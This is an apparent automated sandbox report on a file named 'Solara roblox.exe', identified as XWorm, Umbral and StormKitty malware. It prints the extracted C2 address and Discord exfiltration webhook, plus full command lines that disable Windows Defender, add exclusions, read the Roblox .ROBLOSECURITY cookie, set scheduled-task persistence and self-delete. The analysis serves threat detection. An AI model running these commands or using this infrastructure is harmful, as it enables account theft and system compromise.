Analysis
-
max time kernel
1842s -
max time network
1851s -
platform
windows7_x64 -
resource
win7-20240704-en -
resource tags
arch:x64arch:x86image:win7-20240704-enlocale:en-usos:windows7-x64system -
submitted
09-07-2024 12:04
Behavioral task
behavioral1
Sample
Solara roblox.exe
Resource
win7-20240704-en
Behavioral task
behavioral2
Sample
Solara roblox.exe
Resource
win10v2004-20240704-en
General
-
Target
Solara roblox.exe
-
Size
102KB
-
MD5
ce28d82fa8e4dbbd72cae1bf8d4930e1
-
SHA1
0cba2f93bc5c9d9e4f950c66e7ac3acee3ce418f
-
SHA256
d9ca4eaa59a18b4b30518a5c85c757a8b04240e579a1460f0472c608aa2b7bc2
-
SHA512
ba5506f4dfa1c46e9ac38ca1c6ffabd1870eb4c99d98dae963dda8c387cc1c423a1cbef09f93befba889a65f8f51f34663f64dbb14743c82d8ec40fc036fe57e
-
SSDEEP
3072:Eb1Z3z4aicVw+NUbUq5dikO3WGWlxUJ1lbE812:Eb1ldC+UbUSdiIdnUJfEm
Malware Config
Extracted
xworm
127.0.0.1:62559
19.ip.gl.ply.gg:62559
-
Install_directory
%AppData%
-
install_file
svchost.exe
Extracted
umbral
https://discord.com/api/webhooks/1260178339398684763/vrimjbksRiAdnQJhpf4RiMhDKhDPxfoJKYZ-ILxv3PIxTVVzEhCZeqgCy8f3wVpGOLPx
Signatures
-
Detect Umbral payload 5 IoCs
Processes:
resource yara_rule C:\Users\Admin\AppData\Local\Temp\gyfdsf.exe family_umbral behavioral1/memory/2584-42-0x0000000000A50000-0x0000000000A96000-memory.dmp family_umbral behavioral1/memory/2300-117-0x0000000000B20000-0x0000000000B66000-memory.dmp family_umbral behavioral1/memory/916-161-0x0000000000EC0000-0x0000000000F06000-memory.dmp family_umbral behavioral1/memory/2904-208-0x00000000001F0000-0x0000000000236000-memory.dmp family_umbral -
Detect Xworm Payload 22 IoCs
Processes:
resource yara_rule behavioral1/memory/2912-1-0x0000000001090000-0x00000000010B0000-memory.dmp family_xworm C:\Users\Admin\AppData\Roaming\svchost.exe family_xworm behavioral1/memory/1712-34-0x0000000000F30000-0x0000000000F50000-memory.dmp family_xworm behavioral1/memory/2456-109-0x0000000001290000-0x00000000012B0000-memory.dmp family_xworm behavioral1/memory/1232-251-0x0000000000210000-0x0000000000230000-memory.dmp family_xworm behavioral1/memory/1672-277-0x00000000010A0000-0x00000000010C0000-memory.dmp family_xworm behavioral1/memory/2464-279-0x0000000000230000-0x0000000000250000-memory.dmp family_xworm behavioral1/memory/1408-281-0x00000000010B0000-0x00000000010D0000-memory.dmp family_xworm behavioral1/memory/1800-284-0x0000000000190000-0x00000000001B0000-memory.dmp family_xworm behavioral1/memory/1988-286-0x0000000000F70000-0x0000000000F90000-memory.dmp family_xworm behavioral1/memory/872-289-0x00000000001F0000-0x0000000000210000-memory.dmp family_xworm behavioral1/memory/2604-290-0x0000000001220000-0x0000000001240000-memory.dmp family_xworm behavioral1/memory/1740-291-0x0000000000290000-0x00000000002B0000-memory.dmp family_xworm behavioral1/memory/1120-292-0x0000000000AA0000-0x0000000000AC0000-memory.dmp family_xworm behavioral1/memory/1292-293-0x0000000000F90000-0x0000000000FB0000-memory.dmp family_xworm behavioral1/memory/1860-294-0x00000000001B0000-0x00000000001D0000-memory.dmp family_xworm behavioral1/memory/1204-295-0x00000000010E0000-0x0000000001100000-memory.dmp family_xworm behavioral1/memory/2208-296-0x00000000012B0000-0x00000000012D0000-memory.dmp family_xworm behavioral1/memory/2612-297-0x0000000000360000-0x0000000000380000-memory.dmp family_xworm behavioral1/memory/2668-298-0x0000000000BA0000-0x0000000000BC0000-memory.dmp family_xworm behavioral1/memory/2064-299-0x0000000000CB0000-0x0000000000CD0000-memory.dmp family_xworm behavioral1/memory/2452-300-0x00000000003A0000-0x00000000003C0000-memory.dmp family_xworm -
StormKitty
StormKitty is an open source info stealer written in C#.
-
StormKitty payload 1 IoCs
Processes:
resource yara_rule behavioral1/memory/2912-82-0x000000001B9C0000-0x000000001BAE0000-memory.dmp family_stormkitty -
Command and Scripting Interpreter: PowerShell 1 TTPs 8 IoCs
Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.
Processes:
powershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepid process 2456 powershell.exe 2208 powershell.exe 2256 powershell.exe 2872 powershell.exe 824 powershell.exe 2916 powershell.exe 2724 powershell.exe 3068 powershell.exe -
Drops file in Drivers directory 4 IoCs
Processes:
gyfdsf.execqswzx.exeSolara.exeiednmj.exedescription ioc process File opened for modification C:\Windows\System32\drivers\etc\hosts gyfdsf.exe File opened for modification C:\Windows\System32\drivers\etc\hosts cqswzx.exe File opened for modification C:\Windows\System32\drivers\etc\hosts Solara.exe File opened for modification C:\Windows\System32\drivers\etc\hosts iednmj.exe -
Drops startup file 2 IoCs
Processes:
Solara roblox.exedescription ioc process File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\svchost.lnk Solara roblox.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\svchost.lnk Solara roblox.exe -
Executes dropped EXE 35 IoCs
Processes:
svchost.exegyfdsf.exesvchost.exesvchost.exesvchost.execqswzx.exesvchost.exeSolara.exeiednmj.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exepid process 1712 svchost.exe 2584 gyfdsf.exe 2708 svchost.exe 2456 svchost.exe 1052 svchost.exe 2300 cqswzx.exe 1636 svchost.exe 916 Solara.exe 2904 iednmj.exe 1232 svchost.exe 1672 svchost.exe 2464 svchost.exe 1408 svchost.exe 2492 svchost.exe 1800 svchost.exe 1988 svchost.exe 556 svchost.exe 872 svchost.exe 2604 svchost.exe 2512 svchost.exe 2324 svchost.exe 1740 svchost.exe 1120 svchost.exe 1292 svchost.exe 2464 svchost.exe 1860 svchost.exe 1204 svchost.exe 308 svchost.exe 652 svchost.exe 1784 svchost.exe 2208 svchost.exe 2612 svchost.exe 2668 svchost.exe 2064 svchost.exe 2452 svchost.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Adds Run key to start application 2 TTPs 1 IoCs
Processes:
Solara roblox.exedescription ioc process Set value (str) \REGISTRY\USER\S-1-5-21-3294248377-1418901787-4083263181-1000\Software\Microsoft\Windows\CurrentVersion\Run\svchost = "C:\\Users\\Admin\\AppData\\Roaming\\svchost.exe" Solara roblox.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 8 IoCs
Processes:
flow ioc 33 discord.com 34 discord.com 10 discord.com 11 discord.com 19 discord.com 20 discord.com 26 discord.com 27 discord.com -
Looks up external IP address via web service 4 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
Processes:
flow ioc 2 ip-api.com 15 ip-api.com 23 ip-api.com 30 ip-api.com -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Detects videocard installed 1 TTPs 4 IoCs
Uses WMIC.exe to determine videocard installed.
Processes:
wmic.exewmic.exewmic.exewmic.exepid process 1560 wmic.exe 1304 wmic.exe 2384 wmic.exe 2256 wmic.exe -
Runs ping.exe 1 TTPs 4 IoCs
Processes:
PING.EXEPING.EXEPING.EXEPING.EXEpid process 2644 PING.EXE 2372 PING.EXE 1708 PING.EXE 1924 PING.EXE -
Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Suspicious behavior: EnumeratesProcesses 34 IoCs
Processes:
powershell.exepowershell.exepowershell.exepowershell.exeSolara roblox.exegyfdsf.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.execqswzx.exepowershell.exepowershell.exepowershell.exepowershell.exeSolara.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exeiednmj.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepid process 2916 powershell.exe 2724 powershell.exe 3068 powershell.exe 2456 powershell.exe 2912 Solara roblox.exe 2584 gyfdsf.exe 2208 powershell.exe 2292 powershell.exe 1028 powershell.exe 2156 powershell.exe 1740 powershell.exe 2912 Solara roblox.exe 2912 Solara roblox.exe 2912 Solara roblox.exe 2912 Solara roblox.exe 2912 Solara roblox.exe 2912 Solara roblox.exe 2300 cqswzx.exe 2256 powershell.exe 1232 powershell.exe 2384 powershell.exe 2836 powershell.exe 916 Solara.exe 2872 powershell.exe 652 powershell.exe 2476 powershell.exe 1508 powershell.exe 1576 powershell.exe 2904 iednmj.exe 824 powershell.exe 2372 powershell.exe 2524 powershell.exe 2348 powershell.exe 1512 powershell.exe -
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
Processes:
Solara roblox.exepid process 2912 Solara roblox.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
Solara roblox.exepowershell.exepowershell.exepowershell.exepowershell.exesvchost.exegyfdsf.exewmic.exepowershell.exepowershell.exepowershell.exepowershell.exewmic.exedescription pid process Token: SeDebugPrivilege 2912 Solara roblox.exe Token: SeDebugPrivilege 2916 powershell.exe Token: SeDebugPrivilege 2724 powershell.exe Token: SeDebugPrivilege 3068 powershell.exe Token: SeDebugPrivilege 2456 powershell.exe Token: SeDebugPrivilege 2912 Solara roblox.exe Token: SeDebugPrivilege 1712 svchost.exe Token: SeDebugPrivilege 2584 gyfdsf.exe Token: SeIncreaseQuotaPrivilege 3004 wmic.exe Token: SeSecurityPrivilege 3004 wmic.exe Token: SeTakeOwnershipPrivilege 3004 wmic.exe Token: SeLoadDriverPrivilege 3004 wmic.exe Token: SeSystemProfilePrivilege 3004 wmic.exe Token: SeSystemtimePrivilege 3004 wmic.exe Token: SeProfSingleProcessPrivilege 3004 wmic.exe Token: SeIncBasePriorityPrivilege 3004 wmic.exe Token: SeCreatePagefilePrivilege 3004 wmic.exe Token: SeBackupPrivilege 3004 wmic.exe Token: SeRestorePrivilege 3004 wmic.exe Token: SeShutdownPrivilege 3004 wmic.exe Token: SeDebugPrivilege 3004 wmic.exe Token: SeSystemEnvironmentPrivilege 3004 wmic.exe Token: SeRemoteShutdownPrivilege 3004 wmic.exe Token: SeUndockPrivilege 3004 wmic.exe Token: SeManageVolumePrivilege 3004 wmic.exe Token: 33 3004 wmic.exe Token: 34 3004 wmic.exe Token: 35 3004 wmic.exe Token: SeIncreaseQuotaPrivilege 3004 wmic.exe Token: SeSecurityPrivilege 3004 wmic.exe Token: SeTakeOwnershipPrivilege 3004 wmic.exe Token: SeLoadDriverPrivilege 3004 wmic.exe Token: SeSystemProfilePrivilege 3004 wmic.exe Token: SeSystemtimePrivilege 3004 wmic.exe Token: SeProfSingleProcessPrivilege 3004 wmic.exe Token: SeIncBasePriorityPrivilege 3004 wmic.exe Token: SeCreatePagefilePrivilege 3004 wmic.exe Token: SeBackupPrivilege 3004 wmic.exe Token: SeRestorePrivilege 3004 wmic.exe Token: SeShutdownPrivilege 3004 wmic.exe Token: SeDebugPrivilege 3004 wmic.exe Token: SeSystemEnvironmentPrivilege 3004 wmic.exe Token: SeRemoteShutdownPrivilege 3004 wmic.exe Token: SeUndockPrivilege 3004 wmic.exe Token: SeManageVolumePrivilege 3004 wmic.exe Token: 33 3004 wmic.exe Token: 34 3004 wmic.exe Token: 35 3004 wmic.exe Token: SeDebugPrivilege 2208 powershell.exe Token: SeDebugPrivilege 2292 powershell.exe Token: SeDebugPrivilege 1028 powershell.exe Token: SeDebugPrivilege 2156 powershell.exe Token: SeIncreaseQuotaPrivilege 2392 wmic.exe Token: SeSecurityPrivilege 2392 wmic.exe Token: SeTakeOwnershipPrivilege 2392 wmic.exe Token: SeLoadDriverPrivilege 2392 wmic.exe Token: SeSystemProfilePrivilege 2392 wmic.exe Token: SeSystemtimePrivilege 2392 wmic.exe Token: SeProfSingleProcessPrivilege 2392 wmic.exe Token: SeIncBasePriorityPrivilege 2392 wmic.exe Token: SeCreatePagefilePrivilege 2392 wmic.exe Token: SeBackupPrivilege 2392 wmic.exe Token: SeRestorePrivilege 2392 wmic.exe Token: SeShutdownPrivilege 2392 wmic.exe -
Suspicious use of SetWindowsHookEx 1 IoCs
Processes:
Solara roblox.exepid process 2912 Solara roblox.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
Solara roblox.exetaskeng.exegyfdsf.execmd.exedescription pid process target process PID 2912 wrote to memory of 2916 2912 Solara roblox.exe powershell.exe PID 2912 wrote to memory of 2916 2912 Solara roblox.exe powershell.exe PID 2912 wrote to memory of 2916 2912 Solara roblox.exe powershell.exe PID 2912 wrote to memory of 2724 2912 Solara roblox.exe powershell.exe PID 2912 wrote to memory of 2724 2912 Solara roblox.exe powershell.exe PID 2912 wrote to memory of 2724 2912 Solara roblox.exe powershell.exe PID 2912 wrote to memory of 3068 2912 Solara roblox.exe powershell.exe PID 2912 wrote to memory of 3068 2912 Solara roblox.exe powershell.exe PID 2912 wrote to memory of 3068 2912 Solara roblox.exe powershell.exe PID 2912 wrote to memory of 2456 2912 Solara roblox.exe powershell.exe PID 2912 wrote to memory of 2456 2912 Solara roblox.exe powershell.exe PID 2912 wrote to memory of 2456 2912 Solara roblox.exe powershell.exe PID 2912 wrote to memory of 1256 2912 Solara roblox.exe schtasks.exe PID 2912 wrote to memory of 1256 2912 Solara roblox.exe schtasks.exe PID 2912 wrote to memory of 1256 2912 Solara roblox.exe schtasks.exe PID 1308 wrote to memory of 1712 1308 taskeng.exe svchost.exe PID 1308 wrote to memory of 1712 1308 taskeng.exe svchost.exe PID 1308 wrote to memory of 1712 1308 taskeng.exe svchost.exe PID 2912 wrote to memory of 2584 2912 Solara roblox.exe gyfdsf.exe PID 2912 wrote to memory of 2584 2912 Solara roblox.exe gyfdsf.exe PID 2912 wrote to memory of 2584 2912 Solara roblox.exe gyfdsf.exe PID 2584 wrote to memory of 3004 2584 gyfdsf.exe wmic.exe PID 2584 wrote to memory of 3004 2584 gyfdsf.exe wmic.exe PID 2584 wrote to memory of 3004 2584 gyfdsf.exe wmic.exe PID 2584 wrote to memory of 3016 2584 gyfdsf.exe attrib.exe PID 2584 wrote to memory of 3016 2584 gyfdsf.exe attrib.exe PID 2584 wrote to memory of 3016 2584 gyfdsf.exe attrib.exe PID 2584 wrote to memory of 2208 2584 gyfdsf.exe powershell.exe PID 2584 wrote to memory of 2208 2584 gyfdsf.exe powershell.exe PID 2584 wrote to memory of 2208 2584 gyfdsf.exe powershell.exe PID 2584 wrote to memory of 2292 2584 gyfdsf.exe powershell.exe PID 2584 wrote to memory of 2292 2584 gyfdsf.exe powershell.exe PID 2584 wrote to memory of 2292 2584 gyfdsf.exe powershell.exe PID 2584 wrote to memory of 1028 2584 gyfdsf.exe powershell.exe PID 2584 wrote to memory of 1028 2584 gyfdsf.exe powershell.exe PID 2584 wrote to memory of 1028 2584 gyfdsf.exe powershell.exe PID 2584 wrote to memory of 2156 2584 gyfdsf.exe powershell.exe PID 2584 wrote to memory of 2156 2584 gyfdsf.exe powershell.exe PID 2584 wrote to memory of 2156 2584 gyfdsf.exe powershell.exe PID 2584 wrote to memory of 2392 2584 gyfdsf.exe wmic.exe PID 2584 wrote to memory of 2392 2584 gyfdsf.exe wmic.exe PID 2584 wrote to memory of 2392 2584 gyfdsf.exe wmic.exe PID 2584 wrote to memory of 2092 2584 gyfdsf.exe wmic.exe PID 2584 wrote to memory of 2092 2584 gyfdsf.exe wmic.exe PID 2584 wrote to memory of 2092 2584 gyfdsf.exe wmic.exe PID 2584 wrote to memory of 972 2584 gyfdsf.exe wmic.exe PID 2584 wrote to memory of 972 2584 gyfdsf.exe wmic.exe PID 2584 wrote to memory of 972 2584 gyfdsf.exe wmic.exe PID 2584 wrote to memory of 1740 2584 gyfdsf.exe powershell.exe PID 2584 wrote to memory of 1740 2584 gyfdsf.exe powershell.exe PID 2584 wrote to memory of 1740 2584 gyfdsf.exe powershell.exe PID 2584 wrote to memory of 1560 2584 gyfdsf.exe wmic.exe PID 2584 wrote to memory of 1560 2584 gyfdsf.exe wmic.exe PID 2584 wrote to memory of 1560 2584 gyfdsf.exe wmic.exe PID 2584 wrote to memory of 2632 2584 gyfdsf.exe cmd.exe PID 2584 wrote to memory of 2632 2584 gyfdsf.exe cmd.exe PID 2584 wrote to memory of 2632 2584 gyfdsf.exe cmd.exe PID 2632 wrote to memory of 2644 2632 cmd.exe PING.EXE PID 2632 wrote to memory of 2644 2632 cmd.exe PING.EXE PID 2632 wrote to memory of 2644 2632 cmd.exe PING.EXE PID 1308 wrote to memory of 2708 1308 taskeng.exe svchost.exe PID 1308 wrote to memory of 2708 1308 taskeng.exe svchost.exe PID 1308 wrote to memory of 2708 1308 taskeng.exe svchost.exe PID 1308 wrote to memory of 2456 1308 taskeng.exe svchost.exe -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
-
Views/modifies file attributes 1 TTPs 4 IoCs
Processes:
attrib.exeattrib.exeattrib.exeattrib.exepid process 3016 attrib.exe 1820 attrib.exe 1604 attrib.exe 680 attrib.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\Solara roblox.exe"C:\Users\Admin\AppData\Local\Temp\Solara roblox.exe"1⤵
- Drops startup file
- Adds Run key to start application
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Solara roblox.exe'2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'Solara roblox.exe'2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\svchost.exe'2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'svchost.exe'2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\schtasks.exe"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "svchost" /tr "C:\Users\Admin\AppData\Roaming\svchost.exe"2⤵
- Scheduled Task/Job: Scheduled Task
-
C:\Users\Admin\AppData\Local\Temp\gyfdsf.exe"C:\Users\Admin\AppData\Local\Temp\gyfdsf.exe"2⤵
- Drops file in Drivers directory
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" csproduct get uuid3⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\attrib.exe"attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\gyfdsf.exe"3⤵
- Views/modifies file attributes
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\gyfdsf.exe'3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 23⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" os get Caption3⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" computersystem get totalphysicalmemory3⤵
-
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" csproduct get uuid3⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER3⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\System32\Wbem\wmic.exe"wmic" path win32_VideoController get name3⤵
- Detects videocard installed
-
C:\Windows\system32\cmd.exe"cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\gyfdsf.exe" && pause3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\PING.EXEping localhost4⤵
- Runs ping.exe
-
C:\Users\Admin\AppData\Local\Temp\cqswzx.exe"C:\Users\Admin\AppData\Local\Temp\cqswzx.exe"2⤵
- Drops file in Drivers directory
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" csproduct get uuid3⤵
-
C:\Windows\system32\attrib.exe"attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\cqswzx.exe"3⤵
- Views/modifies file attributes
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\cqswzx.exe'3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 23⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY3⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY3⤵
-
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" os get Caption3⤵
-
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" computersystem get totalphysicalmemory3⤵
-
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" csproduct get uuid3⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER3⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\System32\Wbem\wmic.exe"wmic" path win32_VideoController get name3⤵
- Detects videocard installed
-
C:\Windows\system32\cmd.exe"cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\cqswzx.exe" && pause3⤵
-
C:\Windows\system32\PING.EXEping localhost4⤵
- Runs ping.exe
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c start "" "C:\Solara.exe"2⤵
-
C:\Solara.exe"C:\Solara.exe"3⤵
- Drops file in Drivers directory
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" csproduct get uuid4⤵
-
C:\Windows\system32\attrib.exe"attrib.exe" +h +s "C:\Solara.exe"4⤵
- Views/modifies file attributes
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Add-MpPreference -ExclusionPath 'C:\Solara.exe'4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 24⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY4⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY4⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" os get Caption4⤵
-
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" computersystem get totalphysicalmemory4⤵
-
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" csproduct get uuid4⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER4⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\System32\Wbem\wmic.exe"wmic" path win32_VideoController get name4⤵
- Detects videocard installed
-
C:\Windows\system32\cmd.exe"cmd.exe" /c ping localhost && del /F /A h "C:\Solara.exe" && pause4⤵
-
C:\Windows\system32\PING.EXEping localhost5⤵
- Runs ping.exe
-
C:\Users\Admin\AppData\Local\Temp\iednmj.exe"C:\Users\Admin\AppData\Local\Temp\iednmj.exe"2⤵
- Drops file in Drivers directory
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" csproduct get uuid3⤵
-
C:\Windows\system32\attrib.exe"attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\iednmj.exe"3⤵
- Views/modifies file attributes
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\iednmj.exe'3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 23⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY3⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY3⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" os get Caption3⤵
-
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" computersystem get totalphysicalmemory3⤵
-
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" csproduct get uuid3⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER3⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\System32\Wbem\wmic.exe"wmic" path win32_VideoController get name3⤵
- Detects videocard installed
-
